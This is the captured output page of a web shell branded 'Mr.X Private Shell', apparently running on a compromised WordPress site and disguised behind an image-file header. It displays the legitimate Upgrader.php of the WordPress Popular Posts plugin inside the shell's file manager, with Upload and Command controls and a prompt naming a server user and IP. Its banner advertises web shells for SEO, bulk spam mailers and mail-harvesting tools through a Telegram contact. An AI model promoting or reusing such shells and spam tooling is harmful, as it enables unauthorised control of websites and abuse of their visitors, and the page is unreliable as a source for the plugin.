����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

eblama1@216.73.217.57: ~ $
<?php
/**
 * Handles plugin upgrades.
 *
 * @link       https://cabrerahector.com
 * @since      7.4.0
 *
 * @package    WordPressPopularPosts
 */

namespace WordPressPopularPosts;

use WordPressPopularPosts\Activation\Activator;
use WordPressPopularPosts\Helper;

class Upgrader {

    /**
     * Registers class hooks.
     *
     * @since   7.4.0
     */
    public function hooks()
    {
        add_action('init', [$this, 'upgrade_check']);
    }

    /**
     * Checks whether an upgrade is required.
     *
     * @since   2.4.0
     */
    public function upgrade_check()
    {
        $this->upgrade_site();
    }

    /**
     * Upgrades single site.
     *
     * @since   4.0.7
     */
    private function upgrade_site()
    {
        // Get WPP version
        $wpp_ver = get_option('wpp_ver');

        if ( ! $wpp_ver ) {
            add_option('wpp_ver', WPP_VERSION);
        } elseif ( version_compare($wpp_ver, WPP_VERSION, '<') ) {
            $this->upgrade();
        }
    }

    /**
     * On plugin upgrade, performs a number of actions: update WPP database tables structures (if needed),
     * run the setup wizard (if needed), and some other checks.
     *
     * @since   2.4.0
     * @access  private
     */
    private function upgrade()
    {
        $now = Helper::now();

        // Keep the upgrade process from running too many times
        $wpp_update = get_option('wpp_update');

        if ( $wpp_update ) {
            $from_time = strtotime($wpp_update);
            $to_time = strtotime($now);
            $difference_in_minutes = round(abs($to_time - $from_time)/60, 2);

            // Upgrade flag is still valid, abort
            if ( $difference_in_minutes <= 15 ) {
                return;
            }

            // Upgrade flag expired, delete it and continue
            delete_option('wpp_update');
        }

        // Upgrade flag
        add_option('wpp_update', $now);

        $this->update_db_tables($now);

        // Update WPP version
        update_option('wpp_ver', WPP_VERSION);
        // Remove upgrade flag
        delete_option('wpp_update');
    }

    /**
     * Updates plugin's database tables.
     *
     * @since  7.3.6
     * @access  private
     * @global  object  $wpdb
     */
    private function update_db_tables($now)
    {
        global $wpdb;

        // Set table name
        $prefix = $wpdb->prefix . 'popularposts';

        //phpcs:disable WordPress.DB.DirectDatabaseQuery.DirectQuery,WordPress.DB.DirectDatabaseQuery.NoCaching,WordPress.DB.DirectDatabaseQuery.SchemaChange

        // Update data table structure and indexes
        $dataFields = $wpdb->get_results(
            $wpdb->prepare("SHOW FIELDS FROM %i;", "{$prefix}data")
        );

        foreach ( $dataFields as $column ) {
            if ( 'day' == $column->Field ) {
                $wpdb->query(
                    $wpdb->prepare("ALTER TABLE %i ALTER COLUMN day DROP DEFAULT;", "{$prefix}data")
                );
            }

            if ( 'last_viewed' == $column->Field ) {
                $wpdb->query(
                    $wpdb->prepare("ALTER TABLE %i ALTER COLUMN last_viewed DROP DEFAULT;", "{$prefix}data")
                );
            }
        }

        // Update summary table structure and indexes
        $summaryFields = $wpdb->get_results(
            $wpdb->prepare("SHOW FIELDS FROM %i;", "{$prefix}summary")
        );

        foreach ( $summaryFields as $column ) {
            if ( 'last_viewed' == $column->Field ) {
                $wpdb->query(
                    $wpdb->prepare("ALTER TABLE %i CHANGE last_viewed view_datetime datetime NOT NULL, ADD KEY view_datetime (view_datetime);", "{$prefix}summary")
                );
            }

            if ( 'view_date' == $column->Field ) {
                $wpdb->query(
                    $wpdb->prepare("ALTER TABLE %i ALTER COLUMN view_date DROP DEFAULT;", "{$prefix}summary")
                );
            }

            if ( 'view_datetime' == $column->Field ) {
                $wpdb->query(
                    $wpdb->prepare("ALTER TABLE %i ALTER COLUMN view_datetime DROP DEFAULT;", "{$prefix}summary")
                );
            }
        }

        $summaryIndexes = $wpdb->get_results(
            $wpdb->prepare("SHOW INDEX FROM %i;", "{$prefix}summary")
        );

        foreach( $summaryIndexes as $index ) {
            if ( 'ID_date' == $index->Key_name ) {
                $wpdb->query(
                    $wpdb->prepare("ALTER TABLE %i DROP INDEX ID_date;", "{$prefix}summary")
                );
            }

            if ( 'last_viewed' == $index->Key_name ) {
                $wpdb->query(
                    $wpdb->prepare("ALTER TABLE %i DROP INDEX last_viewed;", "{$prefix}summary")
                );
            }
        }

        $transientsIndexes = $wpdb->get_results(
            $wpdb->prepare("SHOW INDEX FROM %i;", "{$prefix}transients")
        );
        $transientsHasTKeyIndex = false;

        foreach( $transientsIndexes as $index ) {
            if ( 'tkey' == $index->Key_name ) {
                $transientsHasTKeyIndex = true;
                break;
            }
        }

        if ( ! $transientsHasTKeyIndex ) {
            $wpdb->query(
                $wpdb->prepare("TRUNCATE TABLE %i;", "{$prefix}transients")
            );
            $wpdb->query(
                $wpdb->prepare("ALTER TABLE %i ADD UNIQUE KEY tkey (tkey);", "{$prefix}transients")
            );
        }

        // Validate the structure of the tables, create missing tables / fields if necessary
        Activator::track_new_site();

        // Check storage engine
        $storage_engine_data = $wpdb->get_var(
            $wpdb->prepare("SELECT `ENGINE` FROM `information_schema`.`TABLES` WHERE `TABLE_SCHEMA`=%s AND `TABLE_NAME`=%s;", $wpdb->dbname, "{$prefix}data")
        );

        if ( 'InnoDB' != $storage_engine_data ) {
            $wpdb->query(
                $wpdb->prepare("ALTER TABLE %i ENGINE=InnoDB;", "{$prefix}data")
            );
        }

        $storage_engine_summary = $wpdb->get_var(
            $wpdb->prepare("SELECT `ENGINE` FROM `information_schema`.`TABLES` WHERE `TABLE_SCHEMA`=%s AND `TABLE_NAME`=%s;", $wpdb->dbname, "{$prefix}summary")
        );

        if ( 'InnoDB' != $storage_engine_summary ) {
            $wpdb->query(
                $wpdb->prepare("ALTER TABLE %i ENGINE=InnoDB;", "{$prefix}summary")
            );
        }

        //phpcs:enable
    }
}

Filemanager

Name Type Size Permission Actions
Activation Folder 0755
Admin Folder 0755
Block Folder 0755
Compatibility Folder 0755
Container Folder 0755
Front Folder 0755
Rest Folder 0755
Shortcode Folder 0755
Traits Folder 0755
Widget Folder 0755
Bootstrap.php File 752 B 0644
Cache.php File 3.08 KB 0644
Helper.php File 10.93 KB 0644
I18N.php File 1.23 KB 0644
Image.php File 33.92 KB 0644
Output.php File 41.5 KB 0644
Query.php File 24.46 KB 0644
Settings.php File 4.9 KB 0644
Themer.php File 4.47 KB 0644
Translate.php File 4.18 KB 0644
Upgrader.php File 6.57 KB 0644
WordPressPopularPosts.php File 2.62 KB 0644
deprecated.php File 79 B 0644
template-tags.php File 9.84 KB 0644